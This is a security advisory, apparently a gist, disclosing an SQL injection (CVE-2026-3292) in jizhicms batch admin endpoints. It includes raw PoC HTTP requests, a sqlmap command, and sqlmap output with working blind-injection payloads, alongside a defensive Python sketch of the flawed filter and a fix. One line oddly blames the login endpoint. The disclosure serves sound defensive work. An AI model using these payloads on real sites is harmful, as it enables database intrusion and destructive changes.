@0psPwn
Last active February 27, 2026 01:50

SQL Injection Vulnerability in jizhicms ≤ 2.5.6 Batch API

CVE-ID: CVE-2026-3292

BUG_Author: 0ps

Affected Version: jizhicms ≤ 2.5.6

Vendor: 极致CMS | Free and open-source website building system - official site (极致CMS)

Software: Cherry-toto/jizhicms: 极致CMS (hereinafter JIZHICMS) is an open-source, free website building system with no commercial licensing.

Vulnerability Files:

  • frphp/common/Functions.php:52-87 (format_param(..., 1))
  • frphp/lib/Model.php:217-257 (public function findAll)
  • frphp/extend/DB_API.php:164-191 (public function findAll)

Description:

  1. ORM Supports Direct Concatenation of String Conditions (Root Cause):

    • The file frphp/lib/Model.php directly concatenates WHERE clauses in multiple places when $conditions is a string.
    • This can be exploited by sending a crafted request to the login endpoint with malicious SQL code.
  2. Filtering Is Insufficient:

    • Parameter filtering: frphp/common/Functions.php:52-87 (format_param(..., 1))

      • Mainly uses htmlspecialchars + addslashes for processing
    • However, id in( ... ) falls into an unquoted numeric context, where attackers can construct injection snippets that do not require quotation marks

      Most of these interfaces perform delete/update operations, so verifying the injection against them is destructive.
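The following is an added illustration, not code from jizhicms: it models the filter the advisory describes (htmlspecialchars + addslashes, as in format_param(..., 1)) in Python, shows why it is irrelevant in the unquoted numeric context of id in ( ... ), and contrasts it with a hardened handler that only accepts a comma-separated integer list and binds it with placeholders. The function names, the 500-id cap and the sample inputs are assumptions made here.

```python
import html
import re
from typing import List, Tuple

# Model of PHP addslashes(): backslash-escape single quote, double quote,
# backslash and NUL. Constructed for this illustration.
def addslashes(s: str) -> str:
    return re.sub(r"([\"'\\\x00])", r"\\\1", s)

# Model of the advisory's format_param(..., 1): htmlspecialchars then addslashes.
# Only quotes, angle brackets and ampersands are touched; parentheses, spaces,
# comment markers and SQL keywords pass through untouched.
def format_param_model(value: str) -> str:
    return addslashes(html.escape(value, quote=True))

# The string condition built the way the advisory says Model::findAll
# concatenates it: the filtered id list lands inside an unquoted IN (...).
def vulnerable_where(data: str) -> str:
    return "id in (" + format_param_model(data) + ")"

# Hardened form: the batch parameter is only ever a list of ids, so validate
# the shape strictly, coerce to int, cap the batch size and bind the values.
INT_LIST = re.compile(r"\d+(,\d+)*")

def safe_id_list(data: str, max_ids: int = 500) -> List[int]:
    if not INT_LIST.fullmatch(data):
        raise ValueError("data must be a comma-separated list of integers")
    ids = [int(x) for x in data.split(",")]
    if len(ids) > max_ids:
        raise ValueError("too many ids in one batch")
    return ids

def safe_where(data: str) -> Tuple[str, List[int]]:
    ids = safe_id_list(data)
    placeholders = ",".join("?" for _ in ids)
    return f"id in ({placeholders})", ids

if __name__ == "__main__":
    # Constructed inputs: a benign batch and the sleep probe quoted in the advisory.
    for sample in ("12,11,10", "12,11) OR SLEEP(5)-- kCcq", "1' OR '1'='1"):
        print("filtered :", vulnerable_where(sample))
        try:
            print("hardened :", safe_where(sample))
        except ValueError as exc:
            print("hardened : rejected ->", exc)
```

The quoted-context probe is neutralised by the filter, while the numeric-context probe reaches the query unchanged; the hardened handler rejects both and never interpolates the input.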

Proof of Concept (POC):

  1. Log in to obtain the admin cookie:

    http://<target-ip>/index.php/admins/
    
  2. There are multiple places where batch interfaces are called. Basically, as long as there is a batch function, there will be an SQL injection vulnerability. Three sample data packets (test.txt) are provided below:

    • POST /index.php/admins/Article/changeType.html HTTP/1.1
      Host: localhost:8088
      Content-Length: 51
      sec-ch-ua-platform: "Windows"
      Accept-Language: zh-CN,zh;q=0.9
      sec-ch-ua: "Not?A_Brand";v="99", "Chromium";v="130"
      sec-ch-ua-mobile: ?0
      X-Requested-With: XMLHttpRequest
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36
      Accept: */*
      Content-Type: application/x-www-form-urlencoded; charset=UTF-8
      Origin: http://localhost:8088
      Sec-Fetch-Site: same-origin
      Sec-Fetch-Mode: cors
      Sec-Fetch-Dest: empty
      Referer: http://localhost:8088/index.php/admins/Article/articlelist.html
      Accept-Encoding: gzip, deflate, br
      Cookie: PHPSESSID=f0rbvslo0m2bnbsht0ueoankvc
      Connection: keep-alive
      
      tid=2&data=12%2C11%2C10%2C9%2C8%2C7%2C6%2C5%2C4%2C3
    • POST /index.php/admins/Product/changeType.html HTTP/1.1
      Host: localhost:8088
      Content-Length: 50
      sec-ch-ua-platform: "Windows"
      Accept-Language: zh-CN,zh;q=0.9
      sec-ch-ua: "Not?A_Brand";v="99", "Chromium";v="130"
      sec-ch-ua-mobile: ?0
      X-Requested-With: XMLHttpRequest
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36
      Accept: */*
      Content-Type: application/x-www-form-urlencoded; charset=UTF-8
      Origin: http://localhost:8088
      Sec-Fetch-Site: same-origin
      Sec-Fetch-Mode: cors
      Sec-Fetch-Dest: empty
      Referer: http://localhost:8088/index.php/admins/Product/productlist.html
      Accept-Encoding: gzip, deflate, br
      Cookie: PHPSESSID=f0rbvslo0m2bnbsht0ueoankvc
      Connection: keep-alive
      
      data=11%2C10%2C9%2C8%2C7%2C6%2C5%2C4%2C3%2C2&tid=6
    • POST /index.php/admins/Message/checkAll.html HTTP/1.1
      Host: localhost:8088
      Content-Length: 19
      sec-ch-ua-platform: "Windows"
      Accept-Language: zh-CN,zh;q=0.9
      sec-ch-ua: "Not?A_Brand";v="99", "Chromium";v="130"
      sec-ch-ua-mobile: ?0
      X-Requested-With: XMLHttpRequest
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36
      Accept: */*
      Content-Type: application/x-www-form-urlencoded; charset=UTF-8
      Origin: http://localhost:8088
      Sec-Fetch-Site: same-origin
      Sec-Fetch-Mode: cors
      Sec-Fetch-Dest: empty
      Referer: http://localhost:8088/index.php/admins/Message/messagelist.html
      Accept-Encoding: gzip, deflate, br
      Cookie: PHPSESSID=f0rbvslo0m2bnbsht0ueoankvc
      Connection: keep-alive
      
      data=2%2C1&isshow=1
    1. Use sqlmap for automated testing:

      sqlmap -r test.txt --risk=3 --level=5
    2. If successful, it will be displayed as follows:

      POST parameter 'data' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
      
      sqlmap identified the following injection point(s) with a total of 1133 HTTP(s) requests:
      ---
      Parameter: data (POST)
          Type: boolean-based blind
          Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
          Payload: tid=2&data=12,11,10,9,8,7,6,5,4,3) AND 6573=(SELECT (CASE WHEN (6573=6573) THEN 6573 ELSE (SELECT 1049 UNION SELECT 7808) END))-- NXKU
      
          Type: time-based blind
          Title: MySQL >= 5.0.12 OR time-based blind (SLEEP)
          Payload: tid=2&data=12,11,10,9,8,7,6,5,4,3) OR SLEEP(5)-- kCcq
      ---
      [15:16:30] [INFO] the back-end DBMS is MySQL
      web application technology: PHP, Nginx 1.15.11
      back-end DBMS: MySQL >= 5.0.12
      [15:16:39] [INFO] 